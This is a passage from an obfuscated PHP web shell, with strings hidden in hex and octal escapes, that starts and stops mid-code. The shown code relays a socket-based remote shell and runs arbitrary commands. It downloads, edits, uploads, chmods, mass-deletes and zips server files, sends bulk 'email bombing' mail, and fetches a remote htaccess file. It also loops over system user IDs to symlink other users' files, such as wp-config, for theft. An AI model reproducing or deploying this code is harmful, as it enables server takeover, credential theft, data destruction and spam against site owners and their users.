$fstat["\x73\x69\172\x65"]) { $this->brw($pipes[1], $socket, "\123\x54\x44\x4f\125\124", "\123\x4f\x43\x4b\x45\124"); } } } } } } while (!$this->error); foreach ($pipes as $pipe) { fclose($pipe); } $GLOBALS["\104\x46\x53\171\x6e\164\141\170"][11]($process); } fclose($socket); } } } public function DFSAction($action) { switch (strtolower($action)) { case "\144\x6f\x77\x6e\154\x6f\x61\x64": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec($this->query[0]) . $this->Dec($this->query[1]); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if (file_exists($pathfile)) { $type = mime_content_type($pathfile) ?: "\164\145\170\164\x2f\160\154\141\151\x6e"; header("\103\x6f\156\x74\145\x6e\x74\x2d\124\171\x70\145\72\40" . $type); header("\103\x6f\156\x74\145\x6e\164\x2d\x44\x65\163\x63\162\151\160\x74\x69\x6f\x6e\x3a\x20\106\151\154\x65\x20\124\162\141\156\x73\x66\x65\162"); header("\x43\157\156\164\145\156\164\55\x4c\x65\156\x67\x74\x68\72\40" . filesize($pathfile)); header("\103\x6f\x6e\164\145\x6e\x74\55\104\151\x73\x70\x6f\x73\x69\x74\151\157\x6e\72\40\141\x74\164\x61\x63\150\x6d\145\x6e\164\73\x20\146\x69\154\145\156\141\x6d\x65\75\x22" . basename($pathfile) . "\x22"); $GLOBALS["\104\x46\x53\171\156\164\141\x78"][2]($pathfile); } else { echo "\74\x73\143\x72\151\x70\x74\x3e\141\x6c\x65\162\x74\50\x27\106\x69\154\x65\x20\156\x6f\x74\40\x66\157\x75\x6e\144\41\x27\x29\x3b\74\57\x73\143\162\151\160\x74\x3e"; } break; case "\143\x68\x6d\144": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); if (isset($this->query)) { $dirmod = $this->Dec($this->query[0]); $filmod = ''; if (isset($this->query[1])) { $filmod = $this->Dec($this->query[1]); } $_cmod = $this->DFSMod(fileperms($dirmod . $filmod)); echo "\x3c\x73\x65\x63\164\x69\x6f\x6e\x20\143\x6c\x61\x73\163\x3d\x27\x6d\157\144\x61\x72\x65\x61\x27\x3e\74\x70\x3e\x3c\x66\157\156\164\x20\143\x6f\154\x6f\x72\75\47\x77\150\x69\164\145\x27\x3e\114\x6f\x63\141\164\x69\157\156\40\x3a\x20\x3c\x2f\146\x6f\156\x74\x3e\x3c\x66\157\x6e\164\x20\x63\x6f\x6c\157\x72\x3d\47\x23\106\x46\x44\67\x30\x30\47\x3e{$dirmod}{$filmod}\74\x2f\x66\157\156\164\76\x3c\x2f\x70\x3e"; echo "\74\x66\x6f\162\x6d\x20\141\x63\x74\x69\157\156\x3d\x27\47\40\x6d\x65\164\150\157\144\x3d\x27\x50\x4f\123\x54\47\40\x61\165\164\157\x63\157\x6d\x70\x6c\x65\164\145\x3d\x27\x4f\x46\x46\x27\x3e\12\x20\40\x20\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\40\40\x20\40\40\x3c\x69\x6e\x70\165\164\x20\164\171\x70\x65\x3d\47\x74\x65\x78\x74\x27\x20\156\141\155\x65\75\47\155\x6f\x64\146\47\40\160\154\x61\143\145\x68\157\154\x64\145\162\75\x27{$_cmod}\x27\x3e\12\x20\40\40\40\40\x20\x20\40\x20\x20\x20\x20\40\40\40\40\40\x20\x20\40\74\151\156\160\165\x74\40\164\171\160\145\x3d\x27\x73\165\142\x6d\x69\164\x27\40\x6e\141\155\145\75\47\x63\x6d\157\x64\x27\40\166\x61\154\x75\x65\x3d\x27\103\x68\x6d\x6f\x64\47\x3e\xa\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\40\40\x20\x20\x20\40\x3c\57\146\x6f\162\x6d\x3e\x3c\57\163\145\143\x74\151\x6f\x6e\76\12\40\x20\40\40\x20\40\40\40\40\x20\40\x20\40\40\40\x20\40\40\40\40"; if (isset($GLOBALS["\x44\106\103\157\x6e\146\151\147"][1]["\x63\x6d\x6f\144"])) { if ($this->DFSChange($dirmod . $filmod, $GLOBALS["\x44\x46\x43\x6f\x6e\x66\x69\147"][1]["\x6d\x6f\144\146"])) { echo "\74\x73\x63\162\151\160\164\76\141\x6c\145\x72\164\50\47\123\165\x63\143\x65\163\x73\x66\x75\154\x6c\171\40\143\x68\141\x6e\x67\145\144\x21\47\51\x3b\74\57\x73\x63\162\x69\x70\x74\x3e"; } else { echo "\74\163\143\x72\x69\160\164\76\141\154\x65\x72\164\50\x27\x41\156\40\145\x72\162\157\162\40\157\143\x63\165\x72\x65\144\41\x27\51\x3b\x3c\x2f\163\x63\162\x69\160\x74\76"; } } } break; case "\142\x6f\x6d\142\151\156\147": echo "\x3c\144\x69\166\40\143\154\x61\x73\163\x3d\47\x62\x6f\155\x62\151\156\147\x27\76\xa\40\40\x20\x20\40\40\x20\40\x20\40\40\40\x20\x20\x20\x20\x3c\x68\x33\x3e\x45\155\x61\x69\154\x20\x42\157\x6d\142\x69\156\147\74\x2f\150\x33\76\xa\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\40\74\146\x6f\x72\155\40\x61\143\164\x69\x6f\156\x3d\47\x27\x20\x6d\x65\164\150\x6f\x64\75\x27\120\117\x53\124\x27\76\xa\40\40\x20\40\x20\40\40\40\40\x20\x20\40\40\40\40\x20\x3c\164\141\x62\154\145\76\xa\x20\40\40\40\40\x20\40\40\40\x20\x20\40\40\40\x20\40\x20\x20\40\x20\74\x74\162\x3e\xa\40\40\x20\40\x20\x20\x20\40\40\40\40\40\40\40\x20\x20\x20\40\40\40\x20\x20\x20\x20\74\x74\x64\40\143\x6f\154\x73\160\141\x6e\x3d\47\x32\x27\76\x3c\151\156\x70\x75\164\40\x74\171\x70\145\x3d\47\164\145\170\164\x27\x20\156\141\x6d\145\75\x27\155\x61\x69\154\137\163\165\142\152\x65\x63\164\47\x20\160\x6c\141\x63\145\150\157\x6c\144\x65\162\x3d\47\x53\165\142\152\145\143\x74\47\76\74\x2f\164\144\x3e\xa\x20\40\x20\40\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\x20\40\x20\40\x3c\x2f\164\162\76\xa\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\40\x20\x20\40\x20\x20\x3c\164\162\x3e\12\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\40\40\40\40\40\x20\40\x3c\x74\144\x3e\x3c\x74\x65\x78\x74\x61\162\x65\x61\40\156\x61\x6d\x65\75\x27\155\141\151\154\137\x6c\151\x73\x74\x27\x20\160\154\141\143\145\x68\157\154\144\145\x72\75\47\x65\155\141\x69\154\x40\x6c\151\163\x74\x2e\143\157\155\x27\x3e\74\57\x74\145\x78\164\141\x72\x65\x61\x3e\x3c\57\164\144\x3e\12\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\40\40\40\40\x20\x20\40\x20\x20\x20\x3c\x74\x64\x3e\x3c\x74\145\170\x74\x61\x72\145\141\x20\x6e\141\155\x65\x3d\x27\155\141\151\154\137\x74\145\170\164\x27\x20\160\x6c\x61\143\x65\150\x6f\x6c\144\x65\162\x3d\x27\x4d\x65\x73\163\141\x67\145\40\x54\145\x78\x74\x27\76\74\x2f\x74\x65\x78\164\x61\162\145\x61\76\x3c\x2f\164\144\x3e\xa\40\40\x20\40\x20\40\x20\40\x20\40\40\x20\40\40\40\40\40\x20\x20\x20\x3c\x2f\x74\162\76\12\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\x3c\x2f\164\x72\76\12\x20\x20\x20\40\x20\40\40\40\x20\x20\40\x20\x20\40\x20\40\x20\40\40\40\40\40\40\40\74\x74\144\x20\x63\x6f\x6c\163\x70\x61\156\x3d\x27\62\47\x3e\74\x62\x75\164\164\x6f\156\76\123\105\116\x44\x20\x4d\x41\111\114\x3c\x2f\x62\x75\164\164\x6f\156\x3e\x3c\57\x74\x64\76\xa\40\x20\40\40\x20\x20\40\40\40\40\x20\x20\x20\40\40\40\x20\x20\40\40\74\57\x74\162\x3e\xa\40\40\40\40\40\x20\x20\40\40\40\40\40\x20\40\40\x20\74\x2f\x74\x61\142\154\x65\x3e\xa\x20\40\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\40\40\74\57\146\157\162\155\x3e\12\40\x20\40\40\40\40\x20\x20\40\40\x20\40\x20\40\40\40"; if (isset($GLOBALS["\x44\x46\x43\157\x6e\x66\x69\x67"][1]["\155\141\151\154\x5f\x6c\x69\163\x74"]) && isset($GLOBALS["\x44\106\103\157\156\x66\x69\x67"][1]["\x6d\x61\151\x6c\x5f\164\145\170\x74"])) { $emails = explode("\xa", $GLOBALS["\104\x46\103\x6f\x6e\146\x69\x67"][1]["\155\x61\151\x6c\137\x6c\x69\x73\164"]); $message = $GLOBALS["\x44\x46\103\157\156\146\151\x67"][1]["\x6d\x61\151\154\137\x74\145\x78\x74"]; $subject = $GLOBALS["\x44\106\103\157\156\x66\x69\147"][1]["\155\141\151\154\137\163\x75\x62\152\x65\143\x74"]; $headers = "\106\x72\x6f\x6d\x3a\x20" . $GLOBALS["\x44\106\x43\x6f\x6e\146\x69\147"][2]["\123\105\122\x56\x45\122\137\101\104\115\111\116"]; foreach ($emails as $email) { $email = preg_replace("\x2f\134\163\53\x2f\151", '', $email); if (@mail($email, $subject, $message, $headers)) { print "\x3c\x66\x6f\156\x74\40\x63\157\154\157\162\x3d\47\147\x72\x65\x65\x6e\x27\76\105\x6d\x61\x69\154\x20\x73\145\156\164\40\55\x3e\40" . $email . "\x3c\57\x66\x6f\156\164\76\x3c\x62\x72\76"; } else { print "\74\146\157\156\164\x20\x63\157\x6c\157\x72\x3d\47\x72\145\144\x27\x3e\x46\141\151\x6c\145\144\x20\x2d\76\x20" . $email . "\74\57\146\157\x6e\x74\76\74\142\162\76"; } } } echo "\74\57\144\x69\166\x3e"; break; case "\155\141\163\x73\144\145\154": if (isset($GLOBALS["\x44\x46\103\157\156\x66\x69\x67"][1]["\163\145\154\145\143\164\101\x63\x74\151\x6f\x6e"])) { if ($GLOBALS["\x44\x46\x43\157\156\146\x69\147"][1]["\x73\145\x6c\145\143\x74\101\x63\x74\x69\x6f\x6e"] === "\x44\145\154\145\x74\x65") { if (!empty($GLOBALS["\x44\106\x43\x6f\x6e\x66\x69\x67"][1]["\x74\x6f\x5a\x69\x70"])) { if (isset($GLOBALS["\x44\106\103\157\156\146\151\147"][0]["\x64\x66\x70"])) { $delPath = $this->Dec($GLOBALS["\104\x46\x43\157\156\146\x69\x67"][0]["\144\146\160"]) . $slashtype; } else { $delPath = ''; } $toDel = $GLOBALS["\104\x46\103\x6f\x6e\146\151\147"][1]["\x74\x6f\x5a\x69\160"]; for ($i = 0; $i < count($toDel); $i++) { $mdel = explode("\x7c\x7c", $toDel[$i]); $mdel_dir = $this->Dec(urldecode($mdel[0])); $mdel_item = $this->Dec(urldecode($mdel[1])); if (file_exists($mdel_dir . $mdel_item)) { if (is_dir($mdel_dir . $mdel_item)) { @rmdir($mdel_dir . $mdel_item); } if (is_file($mdel_dir . $mdel_item)) { @unlink($mdel_dir . $mdel_item); } } } $this->DFSPopupMSG(3, null, "\123\x65\154\145\143\164\x65\x64\x20\x66\x69\154\x65\x20\x64\145\x6c\145\164\145\x64\41", null, true); } else { $this->DFSPopupMSG(4, null, "\116\157\40\x66\151\154\145\x20\144\145\154\x65\164\x65\x64\41", null, true); } } } break; case "\172\151\160\160\x69\156\147": $ziproc = new ZipArchive(); $slashtype = $this->DFSSlash(); if (isset($GLOBALS["\x44\106\x43\x6f\156\146\151\147"][1]["\x73\145\154\145\x63\164\101\143\164\x69\x6f\156"])) { if ($GLOBALS["\x44\x46\103\x6f\x6e\x66\x69\147"][1]["\x73\x65\x6c\145\143\x74\x41\143\164\x69\x6f\156"] === "\132\x69\x70") { if (empty($GLOBALS["\104\x46\x43\x6f\156\146\151\147"][1]["\x74\157\132\151\x70"])) { print "\x3c\x73\x63\162\151\160\x74\76\141\x6c\145\162\x74\x28\x27\131\x6f\165\x20\150\141\166\x65\40\x74\157\x20\160\x69\143\x6b\x20\141\40\x66\x69\x6c\x65\47\51\x3b\74\x2f\x73\143\x72\151\x70\164\76"; } else { $toZip = $GLOBALS["\104\106\x43\x6f\x6e\x66\151\147"][1]["\x74\157\x5a\x69\160"]; $zipXname = md5(time()) . "\56\172\x69\160"; if (isset($GLOBALS["\104\x46\103\x6f\156\146\x69\x67"][0]["\x64\x66\x70"])) { $zipdirname = $this->Dec($GLOBALS["\x44\x46\103\157\x6e\x66\151\x67"][0]["\144\x66\160"]) . $slashtype . $zipXname; } else { $zipdirname = $zipXname; } if ($ziproc->open($zipdirname, ZipArchive::CREATE | ZipArchive::OVERWRITE)) { for ($i = 0; $i < count($toZip); $i++) { $mzip = explode("\x7c\174", $toZip[$i]); if ($mzip[1] === "\x5b\156\x6f\x76\141\x6c\165\x65\x5d") { $dirtozip = $this->Dec(urldecode($mzip[0])) . $slashtype; $recdir = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dirtozip), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($recdir as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($dirtozip)); $ziproc->addFile($filePath, $relativePath); } } } else { $filetozip = $this->Dec(urldecode($mzip[0])) . $slashtype . $this->Dec(urldecode($mzip[1])); $ziproc->addFile($filetozip, $this->Dec(urldecode($mzip[1]))); } } echo "\x3c\163\143\162\151\x70\164\76\141\x6c\x65\162\164\50\47\163\141\166\145\x64\40\141\x73\x20{$zipXname}\x27\51\x3b\167\151\x6e\x64\157\x77\56\x6c\x6f\143\141\164\151\x6f\156\56\x72\145\160\x6c\141\x63\145\50\x77\151\156\144\x6f\x77\56\x6c\157\143\141\x74\151\157\x6e\56\x68\162\x65\146\x29\x3b\x3c\x2f\163\x63\x72\x69\160\164\x3e"; $ziproc->close(); } } } } break; case "\x75\x70\x6c\157\x61\x64": $slashtype = $this->DFSSlash(); if (!isset($this->query[0])) { $path = getcwd() . $slashtype; } else { $path = $this->Dec($this->query[0]) ?: getcwd() . $slashtype; } $path = $this->Dec($this->DFSDirFilter($path)) . $slashtype; if (isset($GLOBALS["\104\106\103\x6f\x6e\x66\x69\x67"][1]["\144\x66\x75\160\x6c\157\x61\144"])) { if (move_uploaded_file($GLOBALS["\104\x46\103\x6f\x6e\146\151\147"][4]["\x64\146\x66\151\x6c\x65"]["\x74\155\x70\137\x6e\141\x6d\x65"], $path . $GLOBALS["\104\x46\x43\157\x6e\x66\151\147"][4]["\144\x66\x66\151\154\x65"]["\x6e\141\x6d\x65"])) { $this->DFSPopupMSG(3, null, "\106\x69\x6c\145\40\x75\160\x6c\x6f\141\x64\x65\144\41", null, true); } else { $this->DFSPopupMSG(4, null, "\120\x65\x72\155\x69\x73\x73\151\x6f\156\40\144\145\156\151\x65\x64\x21", null, true); } } break; case "\x64\145\163\164": $slashtype = $this->DFSSlash(); if (!isset($GLOBALS["\104\x46\x43\157\x6e\x66\151\x67"][1]["\x64\x65\x73\x74\x72\157\171"])) { echo "\x3c\163\145\143\x74\x69\x6f\x6e\40\x69\x64\x3d\x27\x64\145\163\164\x72\157\x79\x65\x72\x27\76\x3c\x66\157\x72\155\x20\x61\143\x74\151\157\156\x3d\x27\47\x20\155\145\x74\x68\x6f\144\75\47\x50\x4f\x53\x54\47\x3e"; echo "\x3c\x69\x6e\160\165\164\x20\x74\x79\x70\x65\75\x27\x73\x75\x62\x6d\x69\164\47\40\156\141\x6d\x65\x3d\x27\x64\x65\163\164\162\x6f\171\47\40\166\x61\x6c\165\x65\75\47\x52\x65\x6d\157\166\x65\40\164\150\x69\x73\x20\x73\150\145\x6c\154\x27\57\76\x3c\x2f\163\145\143\x74\x69\x6f\156\76\x3c\57\x66\x6f\x72\x6d\x3e"; } else { $DFS_SHELL = $GLOBALS["\104\106\x43\x6f\156\x66\151\x67"][2]["\104\117\x43\125\115\x45\116\124\x5f\122\117\x4f\124"] . $slashtype . $GLOBALS["\104\x46\x43\x6f\156\x66\x69\147"][2]["\x50\110\120\x5f\x53\105\114\x46"]; if (unlink($DFS_SHELL)) { $this->DFSPopupMSG(3, null, "\x46\151\x6c\x65\x20\x64\145\163\x74\162\157\x79\145\144\41\x21", null, false); } else { $this->DFSPopupMSG(4, null, "\x55\x6e\x61\142\x6c\x65\x20\144\x65\163\164\162\x6f\x79\145\x64\41\x21", null, true); } } break; case "\x65\144\x69\x74": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); $pathfile = $this->Dec($this->query[0]) . $this->Dec($this->query[1]); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if (!isset($GLOBALS["\104\106\103\157\156\146\x69\147"][1]["\x64\146\x65\144\x69\x74"])) { echo "\74\x73\145\x63\x74\151\157\x6e\x20\x63\x6c\x61\x73\x73\75\x27\145\x64\x69\x74\146\157\162\x6d\47\x3e"; echo "\x3c\x66\157\x72\x6d\40\x61\x63\x74\x69\157\x6e\75\47\x27\x20\155\145\x74\x68\x6f\144\x3d\x27\x50\x4f\123\x54\47\76"; echo "\74\x74\145\x78\x74\x61\x72\145\141\40\143\154\141\163\x73\x3d\47\x65\x64\x69\x74\143\x6f\156\x74\145\156\x74\47\x20\x6e\x61\155\x65\x3d\x27\145\x64\x69\x74\x78\x27\x3e"; echo htmlspecialchars($GLOBALS["\x44\106\123\171\156\x74\x61\170"][0]($pathfile)); echo "\74\x2f\x74\x65\x78\x74\x61\162\145\x61\76"; echo "\x3c\x69\156\x70\x75\x74\40\164\x79\x70\145\75\47\163\165\x62\155\x69\x74\47\40\x6e\x61\x6d\x65\x3d\x27\144\x66\x65\144\151\x74\47\x20\166\141\x6c\x75\x65\75\47\123\141\166\145\x27\76"; echo "\74\x2f\x66\x6f\x72\x6d\76\74\57\163\x65\143\x74\x69\157\x6e\76"; } else { $pto = fopen($pathfile, "\167"); fwrite($pto, $GLOBALS["\x44\106\x43\x6f\x6e\146\x69\147"][1]["\x65\144\151\164\x78"]); fclose($pto); $this->DFSPopupMSG(3, null, "\123\x61\166\145\x64\41", null, true); } break; case "\x76\151\145\167": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); $pathfile = $this->Dec($this->query[0]) . $this->Dec($this->query[1]); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); echo "\74\160\40\151\x64\x3d\47\x73\x73\150\x6f\167\x73\47\x3e\74\163\x70\x61\x6e\x20\151\x64\75\47\x66\156\141\x6d\x65\163\150\x6f\x77\x27\x3e\106\x69\x6c\145\156\141\x6d\145\40\x2d\76\x20\74\x2f\163\160\x61\x6e\x3e\74\x73\160\x61\x6e\40\x69\x64\x3d\x27\146\156\x61\155\x65\x73\x68\157\167\61\x27\76" . $this->Dec($this->query[1]) . "\74\57\x73\160\x61\x6e\x3e\x3c\x2f\160\x3e"; echo "\74\x73\x65\x63\x74\151\x6f\156\40\143\x6c\141\x73\163\75\x27\163\x6f\x75\162\143\145\163\x27\76"; show_source($pathfile); echo "\x3c\x2f\163\145\x63\164\151\157\156\76\x3c\x64\151\x76\x20\151\144\x3d\x27\142\165\164\x74\157\x6e\x74\x6f\145\144\151\164\47\76\12\40\x20\x20\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\x20\74\141\x20\x68\162\x65\x66\75\47\x3f\144\146\160\75" . urlencode($this->query[0]) . "\x26\144\x66\146\x3d" . urlencode($this->query[1]) . "\x26\144\146\141\143\x74\x69\157\x6e\x3d\x65\x64\151\x74\x27\x3e\xa\x20\40\x20\x20\x20\40\40\40\x20\x20\x20\x20\40\x20\40\x20\x3c\142\x75\164\x74\157\x6e\76\105\x64\x69\x74\x3c\x2f\142\x75\164\164\157\x6e\x3e\x3c\x2f\141\x3e\x3c\57\144\x69\x76\76"; break; case "\x6d\153\146\x69\x6c\x65": $slashtype = $this->DFSSlash(); if (isset($GLOBALS["\104\106\x43\157\156\x66\x69\147"][1]["\143\x72\145\x61\x74\145\x66\151\x6c\145"])) { $fname = $GLOBALS["\x44\x46\x43\x6f\x6e\x66\151\147"][1]["\x6e\x65\x77\146\151\154\x65"] ?: "\156\145\167\x66\151\154\x65\56\164\170\x74"; $fcreate = fopen($this->Dec($this->query[0]) . $slashtype . $fname, "\x77"); fwrite($fcreate, ''); fclose($fcreate); $this->DFSPopupMSG(3, null, "\106\151\x6c\x65\40\x63\162\145\x61\164\x65\x64\x21", null, true); } break; case "\x6d\153\x64\151\x72": $slashtype = $this->DFSSlash(); if (isset($GLOBALS["\x44\106\103\x6f\156\x66\151\x67"][1]["\143\162\145\141\164\x65\146\x6f\154\144\x65\162"])) { $fname = $GLOBALS["\104\x46\103\x6f\x6e\146\x69\147"][1]["\x6e\x65\x77\146\157\x6c\x64\x65\x72"] ?: "\156\x65\x77\x66\157\154\x64\x65\162"; if (!file_exists($fname)) { if (mkdir($this->Dec($this->query[0]) . $slashtype . $fname)) { $this->DFSPopupMSG(3, null, "\x46\157\x6c\x64\x65\x72\40\143\162\145\x61\x74\x65\144\41", null, true); } else { $this->DFSPopupMSG(4, null, "\120\x65\x72\x6d\x69\x73\163\151\x6f\x6e\40\x64\145\x6e\x69\x65\x64\x21", null, true); } } else { $this->DFSPopupMSG(4, null, "\x46\x6f\x6c\x64\x65\x72\x20\145\170\x69\163\164\145\144\x21", null, true); } } break; case "\143\155\144": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); echo "\x3c\x73\x65\x63\164\151\157\156\40\x69\x64\75\x27\143\155\144\x5f\x61\x72\x65\141\x27\x3e"; echo "\x3c\x66\x6f\162\155\40\x61\x63\164\151\x6f\156\x3d\x27\47\x20\155\145\x74\150\x6f\144\75\47\120\117\123\124\47\x20\141\165\x74\x6f\x63\x6f\155\160\154\x65\x74\145\75\47\117\106\106\47\76\74\164\145\170\x74\141\162\145\141\40\143\154\x61\x73\x73\x3d\x27\143\155\x64\x5f\162\x65\x73\x70\157\x6e\x73\145\x27\40\x72\x65\141\144\157\156\154\x79\x3d\x27\124\x52\x55\x45\x27\76"; if (isset($GLOBALS["\x44\x46\x43\x6f\156\x66\151\x67"][1]["\x64\146\x73\x63\x6d\x64"]) && !empty($GLOBALS["\x44\x46\103\157\156\x66\151\x67"][1]["\x64\x66\163\x63\155\x64"])) { $this->DFSExecute($GLOBALS["\104\x46\x43\157\156\146\151\x67"][1]["\x64\x66\x73\x63\x6d\x64"]); } echo "\74\57\x74\145\170\164\x61\x72\145\x61\76\x3c\142\x72\x3e\74\x69\156\x70\x75\164\40\164\171\160\145\x3d\x27\x74\x65\170\164\x27\x20\x6e\x61\155\145\x3d\47\x64\146\x73\x63\x6d\144\x27\x20\x70\154\141\143\145\150\x6f\x6c\144\145\162\x3d\x27\167\x68\x6f\141\x6d\151\x27\76\x3c\142\162\76\x3c\142\165\x74\x74\157\156\x3e\105\170\x65\143\x75\164\145\74\x2f\142\x75\x74\x74\x6f\156\76\x3c\x2f\x66\x6f\162\x6d\76"; echo "\x3c\57\163\x65\143\164\x69\x6f\156\x3e"; break; case "\163\171\155": echo "\x3c\x73\x65\143\164\151\157\x6e\x20\x63\x6c\x61\x73\163\x3d\x27\x73\171\155\154\x69\x6e\153\141\162\x65\141\47\x3e\74\x64\151\x76\x20\x63\154\141\x73\x73\75\x27\x73\171\155\145\170\47\76\74\x6c\x61\142\x65\154\x3e\x45\x78\x61\155\160\154\145\40\x3a\40\57\150\157\155\145\57\x25\173\165\163\x65\162\175\x25\57\160\165\x62\x6c\151\x63\x5f\150\164\155\154\57\164\141\x72\x67\x65\x74\x5f\146\151\x6c\x65\x2e\160\150\x70\40\174\x7c\40\57\166\x61\x72\x2f\167\167\167\x2f\45\x7b\165\163\145\x72\175\x25\57\x68\164\155\x6c\57\x66\x69\x6c\x65\x2e\x70\x68\160\x3c\x2f\154\141\142\x65\154\76\x3c\x2f\x64\151\166\76"; echo "\x3c\164\141\142\x6c\145\x3e\74\x66\157\x72\x6d\x20\x61\x63\x74\151\157\156\x3d\47\47\x20\x6d\x65\164\150\157\144\75\47\120\x4f\123\124\47\x3e"; echo "\x3c\x69\156\160\x75\x74\40\x74\171\x70\145\x3d\x27\x68\x69\x64\144\x65\156\x27\40\x6e\x61\155\145\x3d\47\x64\146\163\x73\x79\155\47\76\74\x62\162\76"; echo "\74\164\162\76\x3c\x74\x64\x20\x69\x64\x3d\x27\x73\x79\x6d\x6c\141\142\x6c\145\47\40\x63\154\141\x73\163\x3d\x27\163\171\x6d\x65\x78\x31\x27\x3e\x3c\154\141\142\x65\154\x3e\x53\171\155\x6c\151\x6e\x6b\40\150\157\x6d\x65\x26\146\151\154\145\x20\164\x61\162\147\x65\164\40\x3a\40\x3c\57\x6c\x61\x62\145\154\76\74\57\164\144\76\x3c\x74\144\x20\151\144\x3d\x27\x73\x79\x6d\154\x61\x62\x6c\145\47\76\x3c\x69\x6e\160\x75\x74\x20\x74\171\x70\145\x3d\x27\x74\x65\170\x74\47\40\x6e\141\x6d\145\x3d\47\x74\141\162\x67\145\x74\47\x20\160\154\x61\x63\145\150\157\x6c\144\145\162\x3d\47\x2f\x70\x61\164\150\57\45\x7b\165\163\x65\162\x7d\45\x2f\x70\x61\164\150\57\146\x69\x6c\x65\56\x70\150\x70\47\x3e\74\57\x74\144\x3e\x3c\x2f\x74\162\x3e"; echo "\x3c\x74\x72\76\x3c\x74\144\x20\x69\x64\75\47\163\171\155\x6c\141\x62\154\x65\47\40\x63\154\x61\163\163\x3d\47\x73\x79\155\145\x78\61\x27\76\74\x6c\x61\142\x65\154\x3e\x53\141\166\145\144\x20\164\x6f\x20\160\x61\164\x68\40\72\40\74\57\154\x61\x62\x65\154\76\x3c\57\164\x64\76\74\x74\144\40\x69\x64\75\47\x73\x79\155\x6c\141\x62\x6c\145\x27\76\74\x69\x6e\x70\165\x74\40\164\171\x70\145\x3d\47\164\145\170\164\x27\x20\x6e\141\x6d\x65\75\47\x70\x61\x74\x68\47\40\160\x6c\141\x63\145\150\157\x6c\x64\x65\162\x3d\x27\160\x61\x74\150\x2f\47\x3e\x3c\x2f\x74\144\x3e\x3c\x2f\x74\162\x3e"; echo "\x3c\x74\162\x3e\74\164\144\x20\x69\144\x3d\x27\x73\171\x6d\x6c\x61\142\154\145\x27\x20\x63\x6c\x61\x73\163\x3d\47\163\171\x6d\x65\x78\61\x27\76\x3c\154\x61\142\145\x6c\x3e\123\x61\166\x65\x64\40\141\x73\x20\72\40\74\57\154\x61\142\145\154\x3e\x3c\57\164\x64\76\x3c\x74\144\x20\151\144\x3d\x27\163\x79\x6d\154\141\142\x6c\x65\x27\x3e\x3c\151\156\160\x75\x74\x20\x74\x79\x70\145\75\47\164\x65\x78\164\x27\x20\156\141\155\145\x3d\x27\144\146\163\x61\x76\145\144\x27\x20\160\154\x61\143\x65\150\x6f\154\x64\x65\x72\x3d\x27\x77\160\x2d\143\x6f\x6e\146\151\x67\56\164\x78\164\x27\x3e\x3c\x2f\x74\144\76\x3c\x2f\x74\162\x3e"; echo "\74\164\x72\76\x3c\164\x64\x20\151\x64\75\47\x73\x79\155\154\141\142\154\145\x27\76\x3c\57\164\144\x3e\74\164\144\40\151\x64\x3d\x27\163\x79\x6d\x6c\141\142\x6c\x65\x27\76\74\142\165\164\x74\x6f\x6e\76\123\x79\155\x6c\x69\x6e\153\x3c\x2f\142\165\x74\x74\157\156\x3e\74\57\164\x64\x3e\74\57\164\x72\x3e\74\57\146\x6f\x72\x6d\76\74\57\164\141\142\154\145\x3e\74\144\151\166\40\x63\x6c\x61\x73\x73\x3d\x27\163\171\x6d\137\162\x65\x73\x70\157\156\x73\x65\47\76"; if (isset($GLOBALS["\x44\106\x43\157\156\x66\x69\x67"][1]["\144\146\163\x73\x79\x6d"])) { if ($GLOBALS["\104\x46\123\120\154\x61\x74\146\157\x72\x6d"] !== "\x77\151\x6e") { if (!file_exists("\163\x79\155")) { mkdir($GLOBALS["\x44\x46\103\x6f\156\x66\151\147"][1]["\160\141\164\150"] . "\x2f\x73\171\155"); } $contents = $GLOBALS["\x44\x46\x53\171\156\164\141\x78"][0](self::$remote_url . "\57\x68\x74\141\x63\x63\x65\163\x73\56\x74\170\164"); for ($uid = 0; $uid < 4000; $uid++) { $nothing = posix_getpwuid($uid); if (!empty($nothing)) { if (!file_exists($GLOBALS["\x44\106\103\x6f\x6e\x66\x69\x67"][1]["\160\141\164\150"] . "\x2f\163\171\155\x2f" . $nothing["\156\x61\155\145"])) { mkdir($GLOBALS["\104\106\x43\157\156\x66\151\x67"][1]["\160\141\x74\150"] . "\57\163\171\155\57" . $nothing["\156\x61\x6d\x65"]); $targetpath = $this->DFSRender("\57\x25\x7b\165\163\145\162\x7d\45\57\151", $nothing["\x6e\x61\155\x65"], base64_decode(urldecode($GLOBALS["\104\106\103\157\x6e\x66\x69\147"][1]["\164\141\162\x67\145\164"]))); if (isset($targetpath)) { $this->DFSExecute("\x6c\x6e\x20\55\163\40" . $targetpath . "\x20" . $GLOBALS["\104\x46\103\x6f\156\x66\151\x67"][1]["\x70\141\164\x68"] . "\57\x73\171\x6d\x2f" . $nothing["\x6e\141\x6d\145"] . "\57" . $GLOBALS["\104\x46\x43\157\156\146\x69\147"][1]["\144\x66\x73\141\x76\x65\144"]); symlink($targetpath, $GLOBALS["\x44\106\x43\x6f\x6e\x66\151\147"][1]["\160\x61\x74\150"] . "\x2f\163\171\x6d\x2f" . $nothing["\x6e\x61\x6d\145"] . "\x2f" . $GLOBALS["\x44\x46\x43\x6f\156\x66\151\147"][1]["\144\x66\x73\141\x76\x65\x64"]); $user_ht = fopen($GLOBALS["\104\106\x43\157\156\x66\151\147"][1]["\x70\141\164\150"] . 